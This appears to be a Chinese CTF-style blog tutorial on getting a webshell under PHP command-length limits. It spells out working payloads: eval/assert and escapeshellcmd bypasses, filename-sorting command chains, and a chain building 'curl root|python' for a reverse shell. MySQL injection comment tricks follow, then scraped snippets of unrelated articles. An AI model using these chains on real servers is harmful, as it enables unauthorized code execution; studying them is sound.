如何在命令长度受限的情况下成功get到webshell(函数参数受限突破、mysql的骚操作)

0x01 问题提出

还记得上篇文章记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门),我们讲到了一些PHP的一些如何巧妙地绕过数字和字母受限的技巧,今天我要给大家分享的是如何在命令长度受限的情况下成功get到webshell,以及关于函数参数受限的突破,mysql的一些骚操作技巧~~~

0x02 问题分析

我们先看个例子:

<?php
    $param = $_REGUEST[‘param‘];
    if(strlen($param) < 17){
        eval($param);
    }
?>

上面这部分意思只是叫我们绕过长度受限就可以执行代码。这个其实就很简单了,我们可以采用调用eval或者assert这种后门函数就可以直接绕过了~~

eval函数中参数是字符,比如像下面这样子:

eval(‘echo 1;‘);

assert函数中参数为表达式(或者为函数),我们可以像下面这样子去实现:

assert(phpinfo()) 

而我参看了PHP手册才了解到,assert是函数,eval不是函数,是一种语言构造器,eval($a)$a只能是字符串,assert($a)$a可以是php代码,也可以是php代码的字符串。assert($a)$a如果是字符串形式不能有2个以上的分号,如果有2个以上的分号只执行到第一个,使用assert来执行多条php语句可借助eval来实现。

例如像下面这个样子:

assert(eval("echo 1;echo 2;"));

结果如下:

比如像上面这句,如果是assert(eval("echo 1;echo 2")),这样写是不会执行echo 1也不会执行echo 2的,因为eval使用的字符串要是有分号的php语句,只要有字符串,它就可以当作命令来执行~~

更多细节我们可以参看PHP手册:

eval函数:http://www.php.net/manual/zh/function.eval.php

assert函数:http://php.net/manual/zh/function.assert.php

那如果像下面这个例子呢?

<?php
    $param = $_REGUEST[‘param‘];
    if(
        strlen($param) < 17 &&
        stripos($param, ‘eval‘) == false &&
        stripos($param, ‘assert‘) == false
    ){
        eval($param);
    }
?>

striops函数是用来查找目标字符串在字符串中第一次出现的位置。这里的意思是限制了长度最长为 16 个字符,而且不能用 evalassert,这样我们又该怎么执行命令。

我们可以通过命令执行来绕过限制:

param=`$_GET[1]`;&1=bash

当然了,我们也可以用 exec函数:

param=exec($_GET[1]);

exec可以执行一个外部程序,具体的可以参看PHP手册:http://php.net/manual/zh/function.exec.php

那如果是这个呢?

<?php
    $command = ‘dir ‘.$_POST[‘dir‘];
    $escaped_command = escapeshellcmd($command);
    var_dump($escaped_command);
    file_put_contents(‘out.bat‘,$escaped_command);
    system(‘out.bat‘);
?>

我们对其进行测试:

我们应该如何去绕过呢?

我们来看看这些函数,escapeshellcmd() 函数对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec()system() 函数,或者执行操作符之前进行转义。

escapeshellcmd() 函数的详细用法参看PHP手册:http://php.net/manual/zh/function.escapeshellcmd.php

那么这个函数具体会转义哪些字符呢?

我们通读了源码可以知道,下图这些字符都可以用^来取代其意义。也就是没办法用& | 来执行其他命令,只能列目录

感兴趣的同学可以研究一下源码,我把源码传到本地了:https://files.cnblogs.com/files/ECJTUACM-873284962/exec.rar

那么我们萌生了一个这样的一个tips:执行.bat文件的时候,利用%1a,可以绕过过滤执行命令,我们做了如下尝试:

前面我们已经说了如何限制在16个字符内的情况下拿到webshell,在二进制漏洞利用中,当我们遇到可控数据只有8字节的情况,去掉字符串尾的\0,限制在7个字符。那么在这种情况下,我们又该怎么办呢?

还是看之前那个例子,把命令长度变成7。

<?php
    $param = $_REGUEST[‘param‘];
    if(strlen($param) < 8){
        eval($param);
    }
?>

这让我想起赵本山演的那个小品《钟点工》里面的一个问题,把大象放进冰箱应该分为几步?

此时我们需要铺垫一些基础知识了。

我们可以进行命令的拼装。

我们来个条件更加苛刻的问题,命令长度限制在5,如何完成注入,成功get到webshell呢?

<?php
    $sandbox = ‘/www/sandbox/‘ . md5("orange" . $_SERVER[‘REMOTE_ADDR‘]);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET[‘cmd‘]) && strlen($_GET[‘cmd‘]) <= 5) {
        @exec($_GET[‘cmd‘]);
    } else if (isset($_GET[‘reset‘])) {
        @exec(‘/bin/rm -rf ‘ . $sandbox);
    }
    highlight_file(__FILE__);

举个例子,我们要执行echo hello这个命令,我们应该怎么办呢?

我们可以进行如下构造:

>echo
>hello

结果如下:

我们可以看到创建了两个文件,分别是echo和hello,我们执行*命令

我们可以看到,执行了echo hello这行命令,所以直接打印出了hello字符串

我们可以通过echo *来查看一下*里面的内容

我们通过将>echo和>hello 完成命令拼接,然后用* 组成并执行了命令echo hello

如果条件再苛刻一点呢?把命令长度限制在4,如何完成注入,成功get到webshell呢?

<?php
    $sandbox = ‘/www/sandbox/‘ . md5("orange" . $_SERVER[‘REMOTE_ADDR‘]);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET[‘cmd‘]) && strlen($_GET[‘cmd‘]) <= 4) {
        @exec($_GET[‘cmd‘]);
    } else if (isset($_GET[‘reset‘])) {
        @exec(‘/bin/rm -rf ‘ . $sandbox);
    }
    highlight_file(__FILE__);

比如,我们想要执行ls -l命令,我们可以模仿上面这种做法,进行如下构造:

>ls
>-l

结果如下:

我们可以看到创建了两个文件,分别是ls和-l,我们执行*命令

诶,这咋回事啊,咋还报错了呢?

其实啊,我们刚才生成的echo和hello,e的ASCII值要小于h,所以排序的时候自动将echo排在前面,hello排在后面,而ls我们可以看到,此时文件的显示顺序是-l在ls的前面。如果我们执行* 其实是执行-l ls会弹出报错信息

那么我们又该如何获得ls -l呢?

0x03 解决方案

01.命令内容反序

最简单的一种方式就是按照命令内容反着转过来。

我们可以这个命令字符序列反过来看 l- sl,这样是不是顺序正好满足要求呢?接下来我们只需要用一个可以把字符反过来的命令rev,就可以完成这个功能

所以首先第一步,我们先创建了两个文件,分别是l-sl。

>l-
>sl

结果如下:

然后将l- sl组合写入文件v,然后查看v文件里面的内容。

这里面我们可以看到文件v中多了一个v,对我们命令造成干扰,如果我们只想文件中存在l-sl,那该怎么办呢?

这里有个小trick,dir a b>c这个命令可以将a b写到文件c中,不会写入多余的命令进去。

我们创建一个名为dir的文件,然后执行*>v,可以获得l- ls

>dir
echo *
*>v
cat v

结果如下:

然后我们就只需要对这个命令字符序列反转一下就行了,这里我们有一个rev命令,正好可以将内容反序。

所以我们需要产生一个名为rev的文件,然后执行*v ,此时命令相当于rev v,命名为v是为了被通配符匹配,这样就产生了我们要的输出ls -l

>rev
ls
*v

结果如下:

然后就是输出到文件x,然后就可以执行sh x,成功以4个字符执行长度为5的ls -l命令。

*v>x
cat x
sh x

结果如下:

把上面写的命令编成一个shell脚本如下:

#!/usr/bin/env bash
>l-
>sl
>dir
*>v
>rev
*v>x
sh x

我们可以看到,整个命令链长度均小于等于4,这样我们就可以愉快的执行ls -l命令了~

02.时间排序技巧

在ls命令里面有个参数-t,可以根据出现的时间进行排序,先生成的文件排在后面,后生成的文件排在前面,类似于栈的结构。

假设我们要生成ls -t >g命令,它的逆序是g< t- sl,按照ASCII值排序方式的话,t-会在sl后面,不满足需求。所以我们变通一下,生成命令ls -th >g,逆序就是g> ht- sl,正好满足顺序要求。

>g\>
>ht-
>sl
>dir
*>v
>rev
*v>x
cat x

结果如下:

03.续行符技巧拼接命令

Linux里面有个神奇的符号\(反斜杠),可以进行命令的续行,比如下面这个例子,我创建了两个文件a和b,我们通过ls命令查看效果和续行效果是一样的。

>a
>b
ls
ls

结果如下:

这样,我们就可以构造一连串的拼接命令进行续行操作。再比如,我要构造命令curl root|python

>on
>th\>py\>\|\>ot\>ro\>\ \>rl\>cu\ls -t

结果如下:

这里我们可能会有点疑问,>th\\这里看着是5个字符,超过了4个的限制,实际上是因为shell环境需要输入\\产生\,但是php代码exec时,只需要输入\即可产生\,比如 exec(“>th\”)即可。所以这里实际上是不超过4个字符的。

我们再执行ls -th>g,把这些按照时间顺序导入到g文件里面,再查看一下g文件

然后执行sh g反弹shell即可,这里我就不演示给大家看了,大家可以自己在本机上进行尝试即可~~

这里对如何在命令长度受限的情况下成功get到webshell做个小结:

  • w长度最短的命令
  • ls -t 以创建时间来列出当前目录下所有文件
  • 文件列表以[换行符]分割每个文件
  • 引入 `\` 转义ls时的换行
  • 换行不影响命令执行
  • 成功构造任意命令执行,写入Webshell

关于mysql部分还有一些注释技巧,我给大家列一下:

  • [#] 行内注释
  • [-- ] 行内注释,注意末尾的空格
  • [/*...*/] 段注释,可多行
  • [`] 某些情况下,可以作为注释
  • [;] 支持多句执行的情况下,可直接用分号闭合第一句SQL语句

具体的参考P牛的课件:来自小密圈里的那些奇技淫巧

0x04 扩展阅读

原文地址:https://www.cnblogs.com/ECJTUACM-873284962/p/9452263.html

时间: 2024-10-21 09:50:21

如何在命令长度受限的情况下成功get到webshell(函数参数受限突破、mysql的骚操作)的相关文章

析构函数什么情况下要定义为虚函数?

原文出处:点击我:) 1.第一段代码 #include<iostream>using namespace std;class ClxBase{public:    ClxBase() {};    ~ClxBase() {cout << "Output from the destructor of class ClxBase!" << endl;}; void DoSomething() { cout << "Do someth

SQL&amp;EF优化第一篇 各种情况下的性能测试之count函数篇

测试环境  mssql 08  +win7    数据 30W条 二〇一六年十月二十九日 09:04:43 结论: *>1>主键>可空列    推测未论证: 根据情况优先选择* 因*无需判断某一列是否存在数据  1则是每次仍需要判断

Linux下使用fdisk命令和partprobe命令,在不重启系统的情况下新建分区并格式化

由于工作的需要,最近一段时间一直在学习Linux.学习一门新的知识,我是喜欢根据谋一本书或者某一个学习视频系统的学习,这样可以对学习的新知识有一个系统全面的认识和了解.所以学习之前,没了一本鸟哥的私房菜做为参考书,开始系统的学习Linux. 根据鸟哥的建议,安装虚拟机时,预留了一块空的容量用来练习分区使用.所以在虚拟机上安装Linux系统分区时,只划分了一块4G的容量挂载到根目录“/”下,还有就是只划分了一个2G的swap分区.还有14G的容量没有分配. 在学习磁盘管理时,使用fdisk将剩余的

du命令的使用-----查看当前目录下的文件信息

du命令的使用-----查看当前目录下的文件信息 1.du 参数: (1)  du -a  (2) du -s (3) du -k (4) du -m (5)du -g (6) du -l (7) du -r (8) du -x (9) du -H (10)du -L 注意: du -某参数 后面可以添加文件名字,表示查看指定文件的信息,如果不写,默认是当前目录下所有文件信息. (1)  du -a :为每个指定文件显示使用磁盘的情况.或为每个目录显示使用磁盘的情况.注意 该参数与 du -s的

(hdu step 3.2.6)Monkey and Banana(在第一关键字有序的情况下,根据第二关键字求最长上升子序列的高度之和)

题目: Monkey and Banana Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others) Total Submission(s): 720 Accepted Submission(s): 455   Problem Description A group of researchers are designing an experiment to test the IQ of a m

Ubuntu 在终端关闭情况下仍然运行进程

参考: 让Linux关闭终端(关闭SSH等)后,程序继续运行 Ubuntu 在终端关闭情况下仍然运行进程 在 Ubuntu 16.04 系统下使用 screen 命令在终端关闭情况下仍然运行进程.具体命令如下: sudo apt install screen screen // 回车进入子界面 // 执行命令 // 按 ctrl+a+d 回到主界面 screen -ls // 查看子界面 screen –r [子页面序号] // 回到子界面 2019.5 原文地址:https://www.cnb

在函数被装饰的情况下如何取消装饰器,访问原始函数

在函数被装饰器装饰的情况下,需要保持原始函数的文档,帮助信息等信息,或者直接调用原始函数,此时需要引入wraps模块 #!/usr/bin/env python #coding:utf-8 #@Author:Andy # Date: 2017/6/14 import time from random import randrange # 装饰器 def timer(func): """ Measure function's running time ""&

/etc/sudoers文件设置为允许用户在不输入该用户的密码的情况下使用所有命令

设置用户666在不输入该用户的密码的情况下使用所有命令: grep 666 /etc/sudoers 666 ALL=(ALL) NOPASSWD:ALL#666     ALL=(ALL)       ALL #sudo su - 时是需要输入666用户的密码,才能切换成root权限!!!! $ who am i 666 pts/0 2017-04-26 11:15 -bash-4.1$ sudo su - [[email protected]86 ~]# #免密码切到root权限 # who

自动获取IP地址的命令是什么?您知道在什么情况下,您的Linux才可以自动获取IP地址?

1. 自动获取IP地址的命令是什么?您知道在什么情况下,您的Linux才可以自动获取IP地址? 答:(1) Linux中使用 dhclient 命令可以从DHCP服务器上获得一个可用的IP地址 (2)首先,需要激活网卡eth0:其次,如果linux是虚拟机,那么还需要设置虚拟机的网络是桥接 模式或者NAT模式,桥接模式必须在网络管理员允许分配IP的情况下自动获得IP地址才能成功: NAT模式一般都能成功:最后,可以配置eth0的配置文件/etc/sysconfig/network-scripts